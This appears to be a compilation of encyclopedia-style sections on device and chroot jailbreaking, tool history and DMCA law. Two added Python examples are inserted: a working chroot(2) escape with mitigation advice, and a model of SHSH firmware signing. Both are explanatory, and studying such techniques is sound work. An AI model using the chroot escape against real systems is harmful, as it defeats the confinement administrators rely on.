Privilege escalation - Jailbreaking

A jailbreak is the act of breaking out of a chroot or jail in UNIX-like operating systems or of bypassing digital rights management (DRM), or the tool used to do so. In the former case, it lets the user reach files outside the directory tree that the administrator intended to expose to the application or user in question. In the context of DRM, it lets the user run arbitrary code on a DRM-protected device, as well as break out of chroot-like restrictions. The term was popularized by the iPhone/iOS jailbreaking community and has also been applied to PlayStation Portable hacking; both kinds of device have repeatedly been subject to jailbreaks allowing the execution of arbitrary code, and vendor updates have sometimes disabled those jailbreaks.
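The chroot breakout mentioned above, as an added example that is not code from the original page. It shows the classic chroot(2) escape: a process that keeps CAP_SYS_CHROOT inside a chroot nests a second chroot without changing its working directory, so the working directory is left outside the new root; the kernel only clamps ".." traversal at the process's own root, so repeated chdir("..") climbs to the real filesystem root, and chroot(".") makes that the root again. The jail directory under /tmp and the ESCAPE_* codes are this example's own conventions; the escape runs in a forked child so the caller's root is never changed, and without root (or CAP_SYS_CHROOT) it reports ESCAPE_NOT_PERMITTED rather than failing.

```python
"""Classic chroot(2) escape (added example, not from the page)."""
import os
import tempfile

ESCAPE_OK, ESCAPE_NOT_PERMITTED, ESCAPE_FAILED = 0, 1, 2


def _escape_from_jail(jail: str) -> int:
    """Runs in a forked child. `jail` stands in for the administrator's chroot."""
    # Step 0: enter the jail, as the administrator's setup would have done.
    try:
        os.chroot(jail)
    except PermissionError:
        return ESCAPE_NOT_PERMITTED  # no CAP_SYS_CHROOT: nothing to demonstrate
    os.chdir("/")
    # Inside an empty jail the real /etc/passwd must be invisible.
    if os.path.exists("/etc/passwd"):
        return ESCAPE_FAILED

    # Step 1: nested chroot WITHOUT chdir. The kernel does not move the
    # working directory, so cwd (the old jail root) is now outside our root.
    os.makedirs("escape", exist_ok=True)
    os.chroot("escape")

    # Step 2: ".." is only stopped at the process root, and cwd is outside
    # it, so walking up repeatedly reaches the real filesystem root.
    for _ in range(64):
        os.chdir("..")

    # Step 3: make the real root our root again.
    os.chroot(".")
    return ESCAPE_OK if os.path.exists("/etc/passwd") else ESCAPE_FAILED


def run_chroot_escape_demo() -> int:
    """Run the escape in a child so the caller's root directory is untouched.

    Returns ESCAPE_OK, ESCAPE_NOT_PERMITTED (no CAP_SYS_CHROOT) or ESCAPE_FAILED.
    """
    jail = tempfile.mkdtemp(prefix="jail-")  # empty directory used as the jail
    pid = os.fork()
    if pid == 0:
        code = ESCAPE_FAILED
        try:
            code = _escape_from_jail(jail)
        finally:
            os._exit(code)
    _, status = os.waitpid(pid, 0)
    # Remove the nested directory the child may have created, then the jail.
    for path in (os.path.join(jail, "escape"), jail):
        try:
            os.rmdir(path)
        except OSError:
            pass
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else ESCAPE_FAILED


if __name__ == "__main__":
    print({ESCAPE_OK: "escaped the chroot",
           ESCAPE_NOT_PERMITTED: "chroot not permitted (needs CAP_SYS_CHROOT)",
           ESCAPE_FAILED: "escape failed"}[run_chroot_escape_demo()])
```

The check a practitioner draws from this is the mitigation: a jailed process must drop CAP_SYS_CHROOT (and ideally all of root) before it touches untrusted input, or use a mount namespace with pivot_root instead of chroot, because with that capability retained the jail boundary is a few system calls away.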

Privilege escalation - Jailbreaking

In the case of gaming consoles, jailbreaking is often used to execute homebrew games. In 2011, Sony, with assistance from law firm Kilpatrick Stockton, sued 21-year-old George Hotz and associates of the group fail0verflow for jailbreaking the PlayStation 3 (see Sony Computer Entertainment America v. George Hotz and PlayStation Jailbreak).

iPad - Jailbreaking

Like other iOS devices, the iPad can be "jailbroken", depending on which version of iOS it is running, allowing applications and programs not authorized by Apple to run on the device. Once jailbroken, users can download many applications unavailable through the App Store via unofficial installers such as Cydia, as well as pirated applications. Apple claims jailbreaking "can" void the factory warranty on the device in the United States, even though jailbreaking is legal there. The iPad, released in April 2010, was first jailbroken in May 2010 with the Spirit jailbreak for iOS version 3.1.2. The iPad can be jailbroken on iOS versions 4.3 through 4.3.3 with the web-based tool JailbreakMe 3.0 (released in July 2011), and on iOS versions including 5.0 and 5.0.1 using redsn0w. Absinthe 2.0 was released on May 25, 2012 as the first jailbreak method for all iOS 5.1.1 devices except the 32 nm version of the iPad 2.

iOS jailbreaking - United States

The main law affecting the legality of iOS jailbreaking in the United States is the 1998 Digital Millennium Copyright Act (DMCA), which says that "no person shall circumvent a technological measure that effectively controls access to a work protected under" the Act; that prohibition can be read to cover jailbreaking. Every three years, the law allows the public to propose exemptions for legitimate reasons for circumvention, which last three years if approved. In 2010 and 2012, the U.S. Copyright Office approved exemptions that allowed smartphone users to jailbreak their devices legally, and in 2015 it approved an expanded exemption that also covers other all-purpose mobile computing devices, such as tablets. An exemption does not stop Apple from employing technical countermeasures to prevent jailbreaking or to keep jailbroken phones from functioning, and it remains unclear whether trafficking in the tools that make jailbreaking easy is legal.

iOS jailbreaking - Canada

In November 2012, Canada amended its Copyright Act with new provisions prohibiting tampering with DRM protection, with exceptions including software interoperability. Jailbreaking a device to run alternative software is a form of circumventing digital locks for the purpose of software interoperability.

iOS - Jailbreaking

In 2010, the Electronic Frontier Foundation (EFF) successfully convinced the U.S. Copyright Office to grant an exemption to the general prohibition on circumventing copyright protection systems under the Digital Millennium Copyright Act (DMCA). The exemption allows jailbreaking of iPhones for the sole purpose of adding legally obtained applications to the iPhone. It does not affect the contractual relationship between Apple and an iPhone owner; Apple can still treat jailbreaking as voiding the warranty, and whether it repairs a jailbroken device is at Apple's discretion. At the same time, the Copyright Office exempted unlocking an iPhone from the DMCA's anticircumvention prohibitions. Unlocking allows the iPhone to be used with any wireless carrier that uses the same GSM or CDMA technology the particular phone model was designed for.

Privilege escalation - Jailbreaking

A similar method of jailbreaking exists for S60 Platform smartphones, where utilities such as HelloOX allow the execution of unsigned code and full access to system files, or edited firmware (similar to the M33 hacked firmware used for the PlayStation Portable) is used to circumvent restrictions on unsigned code. Nokia has since issued updates to curb unauthorized jailbreaking, in a manner similar to Apple.

iOS - Jailbreaking

Since the arrival of Apple's native iOS App Store, and—along with it—third-party applications, the general motives for jailbreaking have changed. People jailbreak for many different reasons, including gaining filesystem access, installing custom device themes, and modifying SpringBoard. An additional motivation is that it may enable the installation of pirated apps. On some devices, jailbreaking also makes it possible to install alternative operating systems, such as Android and the Linux kernel. Primarily, users jailbreak their devices because of the limitations of iOS. Depending on the method used, the effects of jailbreaking may be permanent or temporary.

iPad (3rd generation) - Jailbreaking

Researchers demonstrated within hours of the product's release that the third-generation iPad can be "jailbroken" to run applications and programs not authorized by Apple. The third-generation iPad can be jailbroken with redsn0w 0.9.12 or Absinthe 2.0. Apple treats jailbreaking as voiding the factory warranty. One of the main reasons for jailbreaking is to expand the feature set limited by Apple and its App Store. Most jailbreaking tools automatically install Cydia, a native iOS APT client used for finding and installing software on jailbroken iOS devices. Many apps not approved by Apple are extensions and customizations for iOS and other apps. Users install these programs to personalize and customize the interface, add desired features, fix annoyances, and simplify app development by gaining access to the filesystem and command-line tools. However, Apple often patches the exploits used by jailbreaking teams in iOS updates, which is why the third-generation iPad is not always jailbreakable.

iOS jailbreaking - Motivations

One of the reasons for jailbreaking is to expand the feature set limited by Apple and its App Store. Apple checks apps for compliance with its iOS Developer Program License Agreement before accepting them for distribution in the App Store. However, its reasons for banning apps are not limited to safety and security and may be regarded as arbitrary and capricious. In one case, Apple mistakenly banned an app by a Pulitzer-winning cartoonist because it violated its developer license agreement, which specifically bans apps that "contain content that ridicules public figures." To access banned apps, users rely on jailbreaking to circumvent Apple's censorship of content and features. Jailbreaking permits the downloading of programs not approved by Apple, such as user interface customizations and tweaks.

iOS jailbreaking - Comparison to Android rooting

Jailbreaking of iOS devices has sometimes been compared to "rooting" of Android devices. Although both concepts involve privilege escalation, they differ in scope. Some Android devices allow users to modify or replace the operating system after unlocking the bootloader. Moreover, nearly all Android phones have an option to allow the user to install unknown, third-party apps, so no exploit is needed for normal sideloading.

iOS jailbreaking - History of tools

The iPhone Dev Team, Chronic Dev Team, and pod2g collaborated to release Absinthe in January 2012, a desktop-based tool to jailbreak the iPhone 4S for the first time and the iPad 2 for the second time, on iOS 5.0.1 for both devices and also iOS 5.0 for the iPhone 4S. In May 2012 they released Absinthe 2.0, which can jailbreak iOS 5.1.1 untethered on all iPhone, iPad, and iPod touch models that support iOS 5.1.1, jailbreaking the third-generation iPad for the first time. A group of hackers calling themselves the evad3rs released an iOS 6.x jailbreak tool called "evasi0n", available for Linux, OS X, and Windows, on Monday, February 4, 2013 at noon Eastern Standard Time. Due to the high volume of interest in downloading the jailbreak utility, the site initially returned download errors to waiting users. With iOS 6.1.3, Apple patched the exploits used by evasi0n. In April 2013, the latest version of Sn0wbreeze was released, adding support for tethered jailbreaking on A4 devices (i.e. devices no newer than the iPhone 4, iPad (1st generation), or iPod touch (4th generation)).

iOS jailbreaking - History of exploit-disabling patch releases

On September 16, 2015, iOS 9 was released; it shipped with a new "Rootless" security system, dubbed a "heavy blow" to the jailbreaking community.

iOS jailbreaking - History of tools

The iPhone Dev Team, which is not affiliated with Apple, has released a series of free desktop-based jailbreaking tools. In July 2008 it released a version of PwnageTool to jailbreak the then-new iPhone 3G on iPhone OS 2.0 as well as the iPod touch, newly including Cydia as the primary third-party installer for jailbroken software. PwnageTool continued to be updated for untethered jailbreaks of newer iOS versions.

Privilege escalation - Jailbreaking

iOS devices including the iPhone, iPad, and iPod touch have been subject to jailbreaking efforts since their release, continuing with each firmware update. iOS jailbreaking tools usually offer to install Cydia or Sileo, third-party alternatives to the App Store, as a way to find and install system tweaks and binaries. To hinder jailbreaking, Apple's secure boot chain has each stage, from the boot ROM through the low-level bootloader and iBoot to the kernel, verify the signature of the next stage before running it, and installing a firmware version requires SHSH blobs, per-device signatures that Apple's servers issue only for versions Apple is still signing; this blocks custom kernels and prevents downgrades to earlier, jailbreakable firmware once Apple stops signing it. In an "untethered" jailbreak the device boots the patched kernel on its own: either a boot ROM exploit gets a patched low-level bootloader or iBoot accepted despite the signature checks, so that it in turn loads the patched kernel, or the kernel is patched in memory after the normal signed boot has completed.
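A model of the SHSH signing check described above, as an added example that is not Apple's code or code from the page. The HMAC key, ECID values, message layout and firmware byte strings are invented stand-ins: Apple's servers produce RSA signatures that the device verifies against a pinned public key, while here a secret held by the "server" object plays both roles. The model shows the three properties the text relies on: a blob is bound to one device's ECID and one firmware digest, so a patched kernel or another device's blob is rejected; the server refuses to sign a version once its signing window closes, which is what blocks downgrades; and the device-side check is offline, so a blob saved while the version was still signed keeps verifying later.

```python
"""Model of per-device firmware signing (SHSH blobs); added example."""
import hashlib
import hmac
import secrets

# Stand-in for Apple's private signing key (invented for this example).
_SIGNING_KEY = secrets.token_bytes(32)


def firmware_digest(firmware: bytes) -> str:
    return hashlib.sha256(firmware).hexdigest()


def _blob_message(ecid: int, version: str, digest: str) -> bytes:
    # Personalization: the device's ECID is part of what is signed, so a blob
    # issued for one device is useless on another. Layout is invented.
    return f"{ecid:016x}|{version}|{digest}".encode()


class SigningServer:
    """Issues blobs only for firmware versions it is currently willing to sign."""

    def __init__(self, signing_window):
        self.signing_window = set(signing_window)

    def request_blob(self, ecid: int, version: str, firmware: bytes):
        if version not in self.signing_window:
            return None  # signing stopped for this version: no (re)install
        digest = firmware_digest(firmware)
        sig = hmac.new(_SIGNING_KEY, _blob_message(ecid, version, digest),
                       hashlib.sha256).hexdigest()
        return {"ecid": ecid, "version": version, "digest": digest, "sig": sig}

    def close_window(self, version: str) -> None:
        self.signing_window.discard(version)


def device_accepts(ecid: int, firmware: bytes, version: str, blob) -> bool:
    """Boot-time check: is this blob a valid signature for *this* device and
    *this* exact firmware image? The check is offline against a pinned key, so
    it cannot tell a freshly issued blob from one saved earlier."""
    if blob is None or blob["ecid"] != ecid or blob["version"] != version:
        return False
    if blob["digest"] != firmware_digest(firmware):
        return False  # bootloader or kernel image was modified
    expected = hmac.new(_SIGNING_KEY,
                        _blob_message(ecid, version, blob["digest"]),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, blob["sig"])


def demo() -> dict:
    """Walk through the scenarios; every value is expected to be True."""
    fw_old = b"iOS 4.3.3 image (constructed stand-in)"
    patched = fw_old + b" + jailbreak kernel patch"
    server = SigningServer(signing_window={"4.3.3", "5.0"})
    device_a, device_b = 0x000012AB34CD56EF, 0x0000FEDCBA987654

    saved = server.request_blob(device_a, "4.3.3", fw_old)  # saved while signed
    results = {
        "genuine_firmware_boots": device_accepts(device_a, fw_old, "4.3.3", saved),
        "patched_kernel_rejected": not device_accepts(device_a, patched, "4.3.3", saved),
        "other_device_rejected": not device_accepts(device_b, fw_old, "4.3.3", saved),
    }
    server.close_window("4.3.3")  # Apple stops signing the old version
    results["fresh_downgrade_refused"] = (
        server.request_blob(device_a, "4.3.3", fw_old) is None)
    results["saved_blob_still_verifies"] = device_accepts(device_a, fw_old, "4.3.3", saved)
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The last result is the reason saving SHSH blobs while a version was still being signed allowed downgrades: nothing in the device's check distinguishes a replayed blob from a fresh one. Apple later tied the ticket to a nonce generated at boot, which is what defeats that replay; this model deliberately omits the nonce to show the gap the page's text is describing.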

iOS - Jailbreaking

Since its initial release, iOS has been subject to a variety of hacks centered on adding functionality not allowed by Apple. Prior to the 2008 debut of Apple's native iOS App Store, the primary motive for jailbreaking was to bypass Apple's purchase mechanism for installing native applications. Apple has said it would not release iOS software updates designed specifically to break these tools (other than applications that perform SIM unlocking); however, with each subsequent iOS update, previously unpatched jailbreak exploits are usually patched.

iOS jailbreaking - United States

In 2010, Apple announced that jailbreaking "can violate the warranty". This may be affected by the Magnuson-Moss Warranty Act of 1975.

iOS jailbreaking - Canada

There had been several efforts from 2008 to 2011 to amend the Copyright Act (Bill C-60, Bill C-61, and Bill C-32) to prohibit tampering with digital locks, along with initial proposals for C-11 that were more restrictive, but those bills were set aside. In 2011, Michael Geist, a Canadian copyright scholar, cited iPhone jailbreaking as a non-copyright-related activity that overly broad Copyright Act amendments could prohibit.

iOS jailbreaking - Digital Millennium Copyright Act exemptions

In 2007, Tim Wu, a professor at Columbia Law School, argued that jailbreaking "Apple's superphone is legal, ethical, and just plain fun." Wu cited an explicit exemption issued by the Library of Congress in 2006 for personal carrier unlocking, which notes that locks "are used by wireless carriers to limit the ability of subscribers to switch to other carriers, a business decision that has nothing whatsoever to do with the interests protected by copyright" and thus do not implicate the DMCA. Wu did not claim that this exemption applies to those who help others unlock a device or "traffic" in software to do so.

iOS jailbreaking - Digital Millennium Copyright Act exemptions

In 2010, in response to a request by the Electronic Frontier Foundation, the U.S. Copyright Office explicitly recognized an exemption to the DMCA to permit jailbreaking in order to allow iPhone owners to use their phones with applications that are not available from Apple's store, and to unlock their iPhones for use with unapproved carriers. Apple had previously filed comments opposing this exemption and indicated that it considered jailbreaking to be a violation of copyright (and by implication prosecutable under the DMCA). Apple's request to have jailbreaking defined as a copyright violation was denied as part of the 2009 DMCA rulemaking. In its ruling, the Library of Congress affirmed on July 26, 2010 that jailbreaking is exempt from DMCA rules with respect to circumventing digital locks. DMCA exemptions must be reviewed and renewed every three years or else they expire.
